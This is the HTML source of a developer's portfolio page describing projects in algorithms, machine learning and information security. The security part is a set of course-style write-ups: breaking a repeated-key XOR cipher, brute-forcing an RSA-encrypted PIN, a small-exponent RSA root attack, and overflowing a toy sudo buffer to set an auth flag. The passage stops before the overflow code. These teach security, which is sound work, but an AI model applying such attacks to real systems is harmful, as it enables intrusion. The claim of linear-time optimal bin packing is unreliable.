<!DOCTYPE html>
<html lang="en">
<head>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-150824762-1"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-150824762-1');
</script>
<meta charset="UTF-8">
<meta name="description" content="Nadav Gover. Software developer, electrical engineer. Here is my portfolio">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Nadav Gover</title>
<!-- <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous"> -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<link rel="stylesheet" href="https://unpkg.com/flickity@2/dist/flickity.min.css">
<link href="lity-2.4.0/dist/lity.css" rel="stylesheet">
<link rel="stylesheet" href="style.css">
<link href='https://fonts.googleapis.com/css?family=Work Sans' rel='stylesheet'>
<link href='https://fonts.googleapis.com/css?family=Roboto' rel='stylesheet'>
<script src="https://unpkg.com/flickity@2/dist/flickity.pkgd.min.js"></script>
<script src="lity-2.4.0/vendor/jquery.js"></script>
<script src="lity-2.4.0/dist/lity.js"></script>
<!-- <script src="script.js"></script> -->
<!-- <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script> -->
</head>
<body>
<div class="slider">
<div class="load">
</div>
<div class="content">
<div class="principal">
<div class="title">
<span class="name">Nadav Gover</span>
</div>
<p class="quotation">
Logic will get you from A to B.
Imagination
will take you everywhere.</p>
<span class="quotation-author">— Albert Einstein</span>
<!-- <h1>Welcome</h1>
<p>Lorem ipsum dolor, sit amet consectetur adipisicing.</p> -->
</div>
</div>
</div>
<header class="header">
<!-- <div class="title">
<a class="name">Nadav Gover</a>
</div>
<p class="quotation">
Logic will get you from A to B.
<span class="green-word">Imagination</span>
will take you everywhere.</p>
<footer class="quotation-author">— Albert Einstein</footer> -->
<nav class="">
<ul class="scrollable">
<!-- <li><img src="static/img/logo.jpg" alt="nadav gover profile picture" class="logo"></li> -->
<li><a href="#about">About</a></li>
<li><a href="#projects">Projects</a></li>
<li><a href="#algo-coding">Algorithmic Coding</a></li>
<li><a href="#machine-learning">Machine Learning</a></li>
<li><a href="#infosec">Information Security</a></li>
<li><a href="#contact">Contact</a></li>
<li><a href="static/pdf/Nadav_Gover_Resume.pdf">Resume</a></li>
<!-- <li class="float-right"><a href="http://www.github.com/nadavgover" target="_blank"> <i class="fa fa-lg fa-github"></i></a></li> -->
</ul>
</nav>
</header>
<section id="about">
<h3 class="section-title">About Me</h3>
<div class="section-description">
<p>
Hi! I'm Nadav, an electrical engineer and developer from Ma'agan Michael, Israel. It's really cool here, you should come and visit. Really, come and visit.
You can smell the sea from here, and it has become a big part of me. I go there a lot and spend my summers there. I love to dive and I'm a certified divemaster.
Hiking is also something I do a lot. I like best to hike in Israel, close to home. I believe it's important to know your surroundings before you explore far-away places, and what better way to do so than hiking?
Apart from hiking and diving, I also do some other sports. I'm a big tennis fan (Federer of course, don't tell me if you're a Nadal fan. Seriously, don't) and I play some myself.
Also, and this might be a bit surprising, I play a lot of chess. Chess is a great game that has an undeserved reputation for being boring; in fact it is very interesting.
My goal is to become a chess Grandmaster.
</p>
<p>
Most of my development skills I acquired myself. That's how I learn best: hands-on, through trial and error.
I consider my programming skills to be very good (if I may) and I don't feel limited with any task or challenge that I would take.
If I encounter a problem during coding, I have to solve it, for the simple reason that otherwise I just won't fall asleep at night. Well that's a problem.
<br>
I got my B.Sc. in electrical engineering at Tel Aviv University, specializing in computers (hardware and software) and in feedback and control systems.
I was always more drawn to the field of computers and software, or to be specific, to the fields of machine learning and information security.
</p>
<p>
So I guess this pretty much summarizes me in a few words. Now check out some of the projects I did over the years.
</p>
</div>
</section>
<section id="projects" class="projects-container">
<h3 class="section-title">Projects</h3>
<!-- <div class="section-description">
<p>Check out some of my projects I did over the years.</p>
</div> -->
<div class="project-category-container first">
<h5 id="algo-coding" class="project-category">
Algorithmic Coding
</h5>
<div class="carousel-container">
<div class="carousel" data-flickity='{ "imagesLoaded": true, "initialIndex": 0, "setGallerySize": true, "wrapAround": true, "watchCSS": true }'>
<div class="carousel-cell aspect-ratio-524-610" data-aspect-ratio="297:297">
<a href="#sudoku" data-lity><img src="static/img/sudoku.JPG" alt="Sudoku Solver" ></a>
</div>
<div class="carousel-cell aspect-ratio-832-579" data-aspect-ratio="235:214">
<a href="#wikipedia" data-lity><img src="static/img/wikipedia.jpg" alt="Wikipedia Game" ></a>
</div>
<div class="carousel-cell aspect-ratio-3806-2894" data-aspect-ratio="1200:1040">
<a href="#passover-map" data-lity><img src="static/img/knapsack.jpg" alt="Multiple Knapsack Problem"></a>
</div>
<div class="carousel-cell aspect-ratio-1280-623" data-aspect-ratio="1200:1040">
<a href="#splitwise" data-lity><img src="static/img/splitwise.png" alt="Splitwise"></a>
</div>
</div>
</div>
</div>
<div class="project-category-container">
<h5 id="machine-learning" class="project-category">
Machine Learning
</h5>
<div class="carousel-container">
<div class="carousel" data-flickity='{ "imagesLoaded": true, "initialIndex": 0, "setGallerySize": true, "wrapAround": true, "watchCSS": true }'>
<div class="carousel-cell aspect-ratio-796-765">
<a href="#mnist" data-lity><img src="static/img/mnist.JPG" alt="mnist digit recognition" ></a>
</div>
<div class="carousel-cell aspect-ratio-1280-623">
<a href="#iris-svm" data-lity><img src="static/img/iris_scatter_plot.png" alt="Iris data set scatter plot" ></a>
</div>
<div class="carousel-cell aspect-ratio-1280-623">
<a href="#unsupervised-learning" data-lity><img src="static/img/em_clusters_wide.png" alt="EM algorithm clusters"></a>
</div>
<div class="carousel-cell aspect-ratio-1031-625">
<a href="#cnn" data-lity><img src="static/img/cnn.jpg" alt="Convolutional Neural Network"></a>
</div>
</div>
</div>
</div>
<div class="project-category-container last">
<h5 id="infosec" class="project-category">
Information Security
</h5>
<div class="carousel-container">
<div class="carousel" data-flickity='{ "imagesLoaded": true, "initialIndex": 0, "setGallerySize": true, "wrapAround": true, "watchCSS": true }'>
<div class="carousel-cell aspect-ratio-4032-3024" data-aspect-ratio="297:297">
<a href="#cryptography" data-lity><img src="static/img/cryptography.jpg" alt="Cryptography" ></a>
</div>
<div class="carousel-cell aspect-ratio-439-417" data-aspect-ratio="235:214">
<a href="#bof" data-lity><img src="static/img/bof.JPG" alt="Buffer Overflow" ></a>
</div>
<div class="carousel-cell aspect-ratio-604-295" data-aspect-ratio="1200:1040">
<a href="#logical-vulner" data-lity><img src="static/img/logical_vulnerabilities.JPG" alt="Logical Vulerabilities"></a>
</div>
<div class="carousel-cell aspect-ratio-841-259" data-aspect-ratio="1200:1040">
<a href="#libc-rop" data-lity><img src="static/img/rop.JPG" alt="Return to libc and ROP"></a>
</div>
</div>
</div>
</div>
<!--light boxes-->
<div id="sudoku" class="lightbox-content-scroll lity-hide">
<div class="scrollable-content">
<h2>Sudoku Solver</h2>
<p>The Sudoku solver, as its name implies, solves a Sudoku puzzle using a <a href="https://en.wikipedia.org/wiki/Backtracking" target="_blank">backtracking algorithm</a>.
It is implemented with Python.
</p>
<p>
This is probably the first project I've done with Python. The decision to make this project
came during a six-hour bus ride with my friends. We had nothing to do during the ride, and one of my friends
brought a newspaper with him. So we started solving all the puzzles there. When we got to the hard Sudoku, it seemed
too hard for us to do during a bus ride. It was at that moment that I decided I would never solve a Sudoku puzzle by hand again.
When I got home I immediately started working on the Sudoku solver.
</p>
<p>
You know how, when you set out to solve a Sudoku, you write small digits in the corner of a cell, meaning only these numbers can occupy that cell
without violating the Sudoku rules? That's what the Sudoku solver did at first.
It went through the whole puzzle and remembered what could go where. After that, it looked for cells with only one option and filled those numbers in, repeating until the puzzle was finished.
So:
<ol>
<li>Iterate through all the cells in the puzzle and check all the options for each cell</li>
<li>Fill in all the cells that have only one option</li>
<li>Repeat until the Sudoku is solved</li>
</ol>
</p>
<p>
While this method works well on easy Sudokus, it fails to solve hard ones.
The reason is that hard Sudokus often don't have a cell with only one option, which causes the proposed method to enter an infinite loop.
So we need to come up with a new method to overcome this problem.
</p>
<p>
Instead of repeating infinitely, we can guess a number from the list of options we got in step 1, try to solve the Sudoku with this guess, and if it works then this is a solution. If not (e.g. the same number appears twice in a row), we trace our steps backwards and guess the next number in the list of options.
This method is called backtracking.
Since we know that one of the options has to solve the puzzle, we can be sure that we will not encounter an infinite loop this time. So:
<ol>
<li>If Sudoku rules are not violated: <br>
 Iterate through all the cells in the puzzle and check all the options for each cell <br>
 If some cells have one option: <br>
  Fill in all the cells that have only one option <br>
 Else: (must guess a number) <br>
  Pick the cell with the fewest options (this will help it run faster) and guess one of the options
</li>
<li>
Else: (if Sudoku rules are violated) <br>
 Backtrack. Delete all changes from the last guess and guess another number.
</li>
<li>Repeat until the Sudoku is solved</li>
</ol>
This is usually implemented with recursion, as is the case in my Sudoku solver.
</p>
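<p>The backtracking steps above can be sketched in Python. This is a minimal illustration of the idea, not the repository's exact code:</p>

```python
def candidates(board, r, c):
    """Digits that can legally go in cell (r, c) of a 9x9 board (0 = empty)."""
    used = set(board[r]) | {board[i][c] for i in range(9)}
    br, bc = 3 * (r // 3), 3 * (c // 3)
    used |= {board[i][j] for i in range(br, br + 3) for j in range(bc, bc + 3)}
    return [d for d in range(1, 10) if d not in used]

def solve(board):
    """Fill empty cells in place via backtracking; return True when solved."""
    empties = [(r, c) for r in range(9) for c in range(9) if board[r][c] == 0]
    if not empties:
        return True  # no empty cells left: solved
    # Picking the cell with the fewest options prunes the search tree (runs faster).
    r, c = min(empties, key=lambda rc: len(candidates(board, *rc)))
    for d in candidates(board, r, c):
        board[r][c] = d          # guess one of the options
        if solve(board):
            return True
        board[r][c] = 0          # backtrack: undo the guess
    return False                 # no option worked; a previous guess was wrong
```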
<p>
<a href="https://github.com/nadavgover/Sudoku-Solver" target="_blank">View code</a> on GitHub
</p>
<p>
<a href="https://repl.it/@NadavGover/Sudoku-Solver" target="_blank">Try it yourself</a>, just press the green run button
</p>
</div>
</div>
<div id="wikipedia" class="lightbox-content-scroll lity-hide">
<div class="scrollable-content">
<h2>Wikipedia Game</h2>
<p>
The rules of the Wikipedia game are simple. Players start on a randomly selected Wikipedia page and must navigate to another given page only by clicking links in the current article.
The goal is to arrive at the destination page with the fewest number of clicks (steps) and in the least amount of time.
</p>
<p>
This project is all about winning this game. Given a source page and a destination page, the program yields the shortest path between them.
And when you say shortest path, you say <a href="https://en.wikipedia.org/wiki/Breadth-first_search" target="_blank">Breadth-first search (BFS)</a> algorithm.
And indeed this project was implemented with the BFS algorithm and using linked lists with Python.
</p>
<p>
The BFS algorithm finds the shortest path from one node in a graph to another. For that we need a graph and a definition of what each node is.
Here, each node is a Wikipedia page, the root of the search tree is the source page, and the children of each node are the pages linked from its Wikipedia page.
BFS also makes use of a queue, which here was implemented with a linked list.
The algorithm guarantees to yield the shortest path, but there may be more than one path with the same length.
</p>
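<p>The BFS search can be sketched in Python. For illustration the link structure is a plain dictionary mapping a page to its outgoing links; the real project builds this from live Wikipedia pages:</p>

```python
from collections import deque

def shortest_path(links, source, destination):
    """BFS over a page -> [linked pages] mapping; returns one shortest path, or None."""
    queue = deque([source])
    parent = {source: None}          # doubles as the visited set
    while queue:
        page = queue.popleft()
        if page == destination:
            path = []
            while page is not None:  # walk the parent pointers back to the source
                path.append(page)
                page = parent[page]
            return path[::-1]
        for link in links.get(page, []):
            if link not in parent:   # enqueue each unvisited neighbour once
                parent[link] = page
                queue.append(link)
    return None                      # destination unreachable
```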
<p>
<a href="https://github.com/nadavgover/Wikipedia-Game" target="_blank">View code</a> on GitHub
</p>
<p>
<a href="https://repl.it/@NadavGover/Wikipedia-Game" target="_blank">Try it yourself</a>, just press the green run button
</p>
</div>
</div>
<div id="passover-map" class="lightbox-content-scroll lity-hide">
<div class="scrollable-content">
<h2>Bin Packing Problem</h2>
<p>
In the <a href="https://en.wikipedia.org/wiki/Bin_packing_problem" target="_blank">Bin Packing problem</a>
items of different volumes must be packed into a finite number of bins or containers each of volume V in a way that minimizes the number of bins used.
It differs from the <a href="https://en.wikipedia.org/wiki/Knapsack_problem">multiple knapsack problem</a>
in that all items have to be packed into bins, whereas in the multiple knapsack problem a subset of the items can be selected.
</p>
<p>
The motivation for this project is to optimally place guests at an event with a limited number of tables.
To make an analogy to the bin packing problem, the tables are the bins and the guests are the items. This problem is known to be NP-hard.
To achieve a short run time, <a href="https://en.wikipedia.org/wiki/Dynamic_programming" target="_blank">dynamic programming</a> was used.
A matrix with rows representing the guests and columns representing the tables was built. Each entry
in the matrix is the number of guests that could be placed with the current set of tables.
</p>
<p>
Each guest may have one or more constraints. For example, a guest can ask to sit at a certain table or next to some other guest.
Perhaps the guest requires a wheelchair and not all tables can accommodate one. There are many other possible constraints not listed here.
</p>
<p>
The dynamic programming (DP) matrix takes all of this into account and yields the best result
with a run time of <br> O(number of guests + number of tables).
</p>
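<p>The project's DP formulation is more involved than fits here; as a simplified stand-in for the assignment idea, a greedy first-fit placement (a common bin-packing heuristic, not the project's optimal method, and ignoring guest constraints) looks like this:</p>

```python
def place_guests(guest_sizes, table_capacity, num_tables):
    """Greedy first-fit: seat each party at the first table with enough room.
    A heuristic illustration only -- not optimal and not the project's DP."""
    tables = [[] for _ in range(num_tables)]
    free = [table_capacity] * num_tables
    unplaced = []
    for guest, size in guest_sizes:
        for t in range(num_tables):
            if free[t] >= size:      # first table that still has room
                tables[t].append(guest)
                free[t] -= size
                break
        else:                        # no table could take this party
            unplaced.append(guest)
    return tables, unplaced
```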
<p>
Bonus fact: this project is actually used in practice to place guests at the Passover "seder" of Kibbutz Maagan Michael.
</p>
<p>
<a href="https://github.com/nadavgover/Passover-Map" target="_blank">View code</a> on GitHub
</p>
</div>
</div>
<div id="mnist" class="lightbox-content-scroll lity-hide">
<div class="scrollable-content">
<h2>Digit Recognition</h2>
<p>
This project is divided into two parts.
In the first part, a multi-class perceptron classifier was used. A multi-class perceptron classifier is the extension of the <a href="https://en.wikipedia.org/wiki/Perceptron#Learning_algorithm" target="_blank">Perceptron Learning Algorithm</a> (PLA) for binary classification.
A one-vs-all strategy was used, which means each class was trained to identify whether the input is from its class or not (binary classification).
The input in both parts of this project was the MNIST data set, which consists of 70,000 images of handwritten digits from 0 to 9. This means that for the multi-class classifier, 10 different classifiers were trained (one for each digit).
To predict an input image, the label that gets the highest confidence is chosen as the prediction.
</p>
<p>
Since the input data is not linearly separable, PLA will never terminate, and its behavior can become quite unstable, jumping from a good perceptron to a very bad one within a single update.
To overcome this, the <a href="https://en.wikipedia.org/wiki/Perceptron#Variants" target="_blank">pocket algorithm</a> was used. This algorithm keeps 'in its pocket' the best weight vector encountered up to iteration t of PLA.
In the end, the best weight vector will be reported as the final hypothesis.
</p>
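<p>The pocket idea can be sketched in a few lines of Python for the binary case (a simplified illustration; the project's version is multi-class and runs on MNIST):</p>

```python
def pocket_perceptron(X, y, epochs=50):
    """PLA with a 'pocket': remember the best weight vector seen so far.
    X: feature vectors with a leading 1 for the bias term; y: labels in {-1, +1}."""
    w = [0.0] * len(X[0])
    best_w, best_err = w[:], len(X)

    def errors(w):
        # number of misclassified samples under weight vector w
        return sum(1 for x, t in zip(X, y)
                   if (sum(wi * xi for wi, xi in zip(w, x)) >= 0) != (t > 0))

    for _ in range(epochs):
        for x, t in zip(X, y):
            s = sum(wi * xi for wi, xi in zip(w, x))
            if (s >= 0) != (t > 0):                    # misclassified: PLA update
                w = [wi + t * xi for wi, xi in zip(w, x)]
                e = errors(w)
                if e < best_err:                       # pocket: keep the best w
                    best_err, best_w = e, w[:]
    return best_w, best_err
```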
<p>
In the second part of the project a <a href="https://en.wikipedia.org/wiki/Multinomial_logistic_regression" target="_blank">Softmax Regression</a> was applied on the MNIST dataset.
Softmax regression (or multinomial logistic regression) is a generalization of logistic regression to the case where we want to handle multiple classes.
The cost function is the <a href="https://en.wikipedia.org/wiki/Cross_entropy" target="_blank">cross-entropy error</a> but generalized to K classes.
The composition function is the <a href="https://en.wikipedia.org/wiki/Sigmoid_function" target="_blank">sigmoid</a> function. Since zero valued inputs can artificially kill weight updates, the inputs were scaled to be between 0.01 to 1 and not 0 to 1.
The weights were updated using <a href="https://en.wikipedia.org/wiki/Gradient_descent" target="_blank">gradient descent</a>.
</p>
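<p>A single gradient-descent step of softmax regression on the cross-entropy loss can be sketched as follows (an illustrative single-sample update, not the project's vectorized MNIST code):</p>

```python
import math

def softmax(z):
    """Numerically stable softmax over a list of class scores."""
    m = max(z)
    exps = [math.exp(v - m) for v in z]
    s = sum(exps)
    return [e / s for e in exps]

def gradient_step(W, x, label, lr=0.1):
    """One gradient-descent step on the cross-entropy loss for one sample.
    W: one weight vector per class, x: feature vector, label: true class index."""
    probs = softmax([sum(wi * xi for wi, xi in zip(w, x)) for w in W])
    for k in range(len(W)):
        # gradient of cross-entropy w.r.t. the k-th score is (p_k - 1{k == label})
        err = probs[k] - (1.0 if k == label else 0.0)
        W[k] = [wi - lr * err * xi for wi, xi in zip(W[k], x)]
    return W
```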
<p>
Just to demonstrate one of the difficulties of this classifier, look at the following image and see how similar 9 can be to 4, for example:
<br>
<img src="static/img/mnist_misclassification.png" alt="mnist misclassification" style="width: 100%; max-width: 300px;">
<br>
The above image is an example of misclassification: the predicted class is 9 and the actual class is 4.
A human reader would most likely interpret this image as either a 4 or a 9 (perhaps even leaning towards 9, as classified) and might need context to decide.
If a human reader struggles to distinguish between these two classes, all the more so a computer, and certainly a computer without any context.
</p>
<p>
<a href="https://github.com/nadavgover/Digit-Recognition/" target="_blank">View code</a>, final results and conclusions on GitHub
</p>
<p>
<a href="https://repl.it/@NadavGover/Digit-Recognition" target="_blank">Try it yourself</a>, just press the green run button
</p>
</div>
</div>
<div id="iris-svm" class="lightbox-content-scroll lity-hide">
<div class="scrollable-content">
<h2>Iris (flower) Classifier</h2>
<p>
In this project the input is the Iris data set. It consists of 50 samples from each of three species of Iris (Iris setosa, Iris virginica and Iris versicolor), so 150 total samples.
One class is linearly separable from the other two; the latter are not linearly separable from each other.
Four features were measured from each sample: the length and the width of sepals and petals, in centimeters.
A scatter plot of the data set:
<br>
<br>
<img src="static/img/iris_scatter_plot.png" alt="scatter plot of iris data set" style="width: 100%; max-width: 800px;">
</p>
<p>
In this project models were trained with <a href="https://en.wikipedia.org/wiki/Support-vector_machine" target="_blank">Support-vector machines (SVM)</a> using <a href="https://www.microsoft.com/en-us/research/wp-content/uploads/2016/02/tr-98-14.pdf" target="_blank">Sequential Minimal Optimization (SMO)</a> with linear and RBF kernels.
To compare these two models, consider two criteria: run time and performance.
The run time of both models is approximately 10 seconds; the differences between them are small enough to neglect.
In terms of accuracy, the RBF kernel achieved on average 5% more than the linear kernel. The RBF kernel performed well on both the linearly separable data and the non-linearly separable data, while the linear kernel performed well only on the linearly separable data.
</p>
<p>
<a href="https://github.com/nadavgover/Iris-Classifier-with-SVM" target="_blank">View code</a>, final results and conclusions on GitHub
</p>
</div>
</div>
<div id="unsupervised-learning" class="lightbox-content-scroll lity-hide">
<div class="scrollable-content">
<h2>Unsupervised Learning with K-means and EM Algorithms</h2>
<p>
In this project you can see the <a href="https://en.wikipedia.org/wiki/K-means_clustering" target="_blank">K-means</a> and <a href="https://en.wikipedia.org/wiki/Expectation%E2%80%93maximization_algorithm" target="_blank">Expectation Maximization (EM)</a> algorithms in action.
These two algorithms are applied when unsupervised clustering is needed.
In this project there are two 2-dimensional multivariate Gaussian processes.
The data set was created from the given processes with 2,000 samples (1,000 samples for each process) and is shown below:
<br>
<img src="static/img/true_clusters.png" alt="true clusters" style="width: 100%; max-width: 500px;">
<br>
In the above image we can see the two clusters created and their centroids (or means).
</p>
<p>
<strong>K-means:</strong> k-means clustering aims to partition n observations into k clusters in which each observation belongs to the cluster with the nearest mean.
The K-means algorithm was implemented with K=2 (meaning two clusters) and the Euclidean distance metric and was run for 100 iterations.
The initialization vectors were chosen randomly to be 2 different samples of the data set.
The clusters at the end of the run are as follows:
<br>
<img src="static/img/kmeans_clusters.png" alt="k-means clusters" style="width: 100%; max-width: 500px;">
</p>
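<p>The assignment/update loop of K-means can be sketched in Python (a minimal version of Lloyd's algorithm; the <code>init</code> parameter is added here for a deterministic illustration, while the project picks two random samples):</p>

```python
import random

def kmeans(points, k=2, iters=100, init=None):
    """Lloyd's K-means with Euclidean distance.
    init: optional list of starting centroids; defaults to k random samples."""
    centroids = list(init) if init is not None else random.sample(points, k)
    clusters = [[] for _ in range(k)]
    for _ in range(iters):
        clusters = [[] for _ in range(k)]
        for p in points:  # assignment step: each point joins its nearest centroid
            i = min(range(k),
                    key=lambda j: sum((a - b) ** 2 for a, b in zip(p, centroids[j])))
            clusters[i].append(p)
        for i, c in enumerate(clusters):  # update step: centroid moves to the mean
            if c:
                centroids[i] = tuple(sum(dim) / len(c) for dim in zip(*c))
    return centroids, clusters
```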
<p>
<strong>EM: </strong> The EM iteration alternates between performing an expectation (E) step, which creates a function for the expectation of the log-likelihood evaluated using the current estimate for the parameters,
and a maximization (M) step, which computes parameters maximizing the expected log-likelihood found on the E step.
These parameter-estimates are then used to determine the distribution of the latent variables in the next E step.
The model parameters are: centroids (mean vectors), covariance matrices, and mixing coefficients (how many samples are in each cluster).
The algorithm was implemented using an iteration formula that is consistent with diagonal covariance matrices.
The clusters at the end of the run are as follows:
<br>
<img src="static/img/em_clusters.png" alt="EM algorithm clusters" style="width: 100%; max-width: 500px;">
<br>
</p>
<p>
In both K-means and EM we got convergence early on. The main difference is in the mean vectors. While the estimated mean vector of the cluster with mean μ=(3,3) is similar in both algorithms, the estimate for μ=(1,1) is much closer to the true mean with the EM algorithm.
<br>
This is explained by the difference between the algorithms:
<br>
<br>
K-means:
<ol>
<li>It hard-assigns each data point to one particular cluster on convergence.</li>
<li>It makes use of the Euclidean distance.</li>
</ol>
EM:
<ol>
<li>It soft-assigns points to clusters (so it gives a probability of any point belonging to any centroid).</li>
<li>It doesn't depend on the Euclidean distance, but is based on the expectation, i.e., the probability of the point belonging to a particular cluster.</li>
</ol>
This makes k-means biased towards spherical clusters.
<br>
In conclusion, the accuracy of the K-means was lower as compared to that of the EM algorithm.
The tendency of K-means to produce spherical clusters leads to bad results here, while EM benefits from the Gaussian distributions present in the data set.
</p>
<p>
<a href="https://github.com/nadavgover/Unsupervised-Learning-Clustering" target="_blank">View code</a>, final results and conclusions on GitHub
</p>
</div>
</div>
<div id="cryptography" class="lightbox-content-scroll lity-hide">
<div class="scrollable-content">
<h2>Cryptography</h2>
<h3>Stream Cipher</h3>
<p>
In this project we focus on a simple stream cipher called Repeated Key cipher. A repeated key cipher works by XOR-ing the bytes of the plaintext with the bytes of the key similarly to a one-time pad:
<ul>
<li>The first byte of the plaintext is XOR-ed with the first byte of the key</li>
<li>The second byte of the plaintext is XOR-ed with the second byte of the key</li>
<li>...</li>
<li>If the plaintext is longer than the key, start using the key again from the beginning (first its first byte, then its second byte, etc.)</li>
</ul>
</p>
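<p>The cipher itself fits in one line of Python. Because XOR is its own inverse, the same function both encrypts and decrypts:</p>

```python
def repeated_key_xor(data: bytes, key: bytes) -> bytes:
    """XOR each byte of data with a byte of the key, cycling the key as needed."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))
```

For example, <code>repeated_key_xor(repeated_key_xor(msg, key), key)</code> returns <code>msg</code> unchanged.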
<h4>Plaintext Score</h4>
<p>
We need a way to distinguish between English and gibberish, so we need a scoring system: one where a text containing plausible English receives (with high probability) a higher score than a random text.
For example, it should give the string "I am a sentence!" a higher score than "\xc6\xc9u\xd0v\x14\xe2\xcf\xc5\xf5\x1eZ\x10Yd\xd3".
In this project, this is done by comparing the letter frequencies in the plaintext to the well-studied frequencies of letters in the English language.
It was implemented by creating a histogram of the letters in the plaintext, then turning this histogram into probabilities by dividing each count by the total number of letters.
Then we needed an error estimate: a way to measure whether the frequency of letters is consistent with English.
The error measure chosen is the MSE (mean squared error). This was implemented by taking the difference between the frequency of each letter in the plaintext histogram and its frequency in English, squaring the difference,
summing all the squared differences, and dividing by the number of letters to get the mean.
This gives a number between 0 and 1; the closer to zero, the smaller the error and therefore the more probable the text is English. Since we want higher scores to be better, we simply multiply the MSE by -1.
This method alone might work for long texts, where the letter frequencies line up with the language statistics.
</p>
<h4>Brute Force</h4>
<p>
We can also brute force the key. <br/>
We need to attempt all possible keys of a given length, evaluate the plaintext possibilities using the plaintext scoring system, and return the “correct” plaintext.
</p>
<h4>Smarter Break</h4>
<p>
The problem with the brute force method is, well, that it's brute force.<br/>
This means we make many attempts without much thought. Trying to break a key longer than a few bytes is impractical (as we need 2<sup>8(number of bytes)</sup> attempts).<br/>
So we need a much faster way, one that can, for example, break a key of length 10 or higher. We may assume the ciphertext is long.
<br/>
We can take advantage of the fact that we know the encryption algorithm, along with the assumption that the ciphertext is long.
The approach taken here is to split the ciphertext into blocks of the key length. Since every byte of the ciphertext at steps of the key length was encrypted with the same byte of the key, each such block was effectively encrypted with a key of length one! Now all we have to do is break a one-byte key by brute force.
That is not a hard task: we just iterate over all 256 options, score each candidate, and return the best one.
We need to do that as many times as the key length, but each time we are only brute-forcing a key of length 1, which makes the method fast and therefore feasible.
</p>
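<p>The column-by-column break can be sketched in Python. Here <code>english_score</code> is a crude stand-in for the frequency-based scorer described above (it just counts spaces and common lowercase letters):</p>

```python
def english_score(text: bytes) -> int:
    """Crude plaintext score: count spaces and common English letters."""
    return sum(1 for b in text if b in b" etaoinshrdlucmfwygpbvk")

def break_repeated_key(ciphertext: bytes, key_len: int, score) -> bytes:
    """Recover the key one byte at a time.
    Bytes at positions i, i + key_len, i + 2*key_len, ... share one key byte,
    so each such 'column' is a single-byte XOR cipher we can brute-force."""
    key = bytearray()
    for i in range(key_len):
        column = ciphertext[i::key_len]          # all bytes under key byte i
        best = max(range(256),                    # 256 guesses per key byte
                   key=lambda k: score(bytes(b ^ k for b in column)))
        key.append(best)
    return bytes(key)
```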
<h3>RSA</h3>
In this section we broke several simplistic schemes that are based on RSA. <br/>
We have a (hypothetical) ATM.
After the user inserts a credit card, the machine sends both the credit card number and the PIN code the user entered to a remote server for verification. Once the server responds, the ATM verifies the response and, if it's valid, gives the user their money.
When a user enters a 4-digit PIN code, the machine encrypts it with a 2048-bit RSA public key before sending it to the server. The goal is to recover the PIN.<br/>
Since we know the PIN is a 4-digit number, we can iterate through all possible options, encrypt each one with the RSA public key, and compare it with the encrypted PIN we intercepted.
The option that matches is the PIN.<br/>
The same ATM machine also sends the encrypted credit card number, a 8-9 digit number, to the server. Since the developers of the ATM were paranoid, they encrypted the credit card number with a different 2048 bit RSA key.<br/>
The task is to find the card number.<br/>
This time the vulnerability is that e is small (e = 3).
We notice that the largest credit card number is 999999999, and that this number raised to the power e is still less than n.
(This is exactly why the attack works only for small e.)
Recall that RSA encryption is c = m<sup>e</sup> (mod n); but here, since m<sup>e</sup> is less than n, the modular reduction never happens and c = m<sup>e</sup> over the plain integers.
So we can take the logarithm of both sides (say base 10; the base doesn't matter).
Computing the logarithm of this number is computationally cheap.
After the algebra we get m = 10<sup>(log(c) / e)</sup>, i.e. m is simply the e-th root of c.
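The same idea can also be computed with an exact integer root instead of floating-point logarithms, which sidesteps any rounding concerns (the card number below is hypothetical):

```python
# Small-exponent attack: when m**e < n, c = m**e holds over the plain
# integers, so m is just the integer e-th root of c.
def integer_root(c: int, e: int) -> int:
    """Binary-search the smallest m with m**e >= c."""
    lo, hi = 0, 1 << ((c.bit_length() // e) + 1)
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** e < c:
            lo = mid + 1
        else:
            hi = mid
    return lo

card = 987654321               # hypothetical credit card number
c = card ** 3                  # e = 3, and card**3 < n: no mod reduction
print(integer_root(c, 3))      # 987654321
```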
<p>
<a href="https://github.com/nadavgover/Cryptography" target="_blank">View code</a> on GitHub
</p>
</div>
</div>
<div id="bof" class="lightbox-content-scroll lity-hide">
<div class="scrollable-content">
<h2>Buffer Overflow (BOF)</h2>
<h3>Background</h3>
<p>
In this project, we exploited a vulnerability to gain root permissions.
The program we attacked is sudo - a standard program included on Unix systems, and
used to execute commands with root permissions.
<ul>
<li>Like most file systems, each file is owned by a user/group</li>
<li>One of the permissions bits on a file is the setuid bit</li>
<li>When set, this bit causes a program to automatically run under the permissions of the user owning the file</li>
<li>The sudo program is owned by the root user and has the setuid bit on</li>
<li>When a user tries to use sudo, it checks that the user belongs to the sudoers
group, and then executes the command</li>
</ul>
It should now be clear why the sudo program is an attractive target. With our goal
clearly set, let’s begin.
</p>
<h3>Cracking sudo</h3>
<p>
We have a sudo program which receives a password and executes a command as root iff the password is correct.
However, we don’t know the password… We do have the source code for the program.
<br>
The vulnerability in this code is a call to strcat with the wrong sizes.
The buffer is 20 bytes long, 10 of those bytes are already in use, and the password may be 10 bytes as well,
so we can actually reach buffer[20] (normally buffer[19] would hold the terminating \0) and put there whatever we want.
Using IDA together with the source code, we can see that the variable auth sits directly above the buffer on the stack,
so overflowing the buffer overflows into auth.
We can also see that when auth is 1 the validation returns true.
Since auth is initialized to zero, overwriting just its lowest byte with 1 makes its whole value 1.
(This would not work if auth were not initialized to zero, because then the higher bytes of auth, which we cannot reach, would be nonzero.)
So, using this fact, we put the value 1 in the last byte of our password.
</p>
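Under the layout described above, the malicious password can be sketched like this (the filler bytes are arbitrary; only the final byte matters):

```python
# A 20-byte buffer with 10 bytes already in use, and auth (initialized
# to 0) sitting right above it on the stack.
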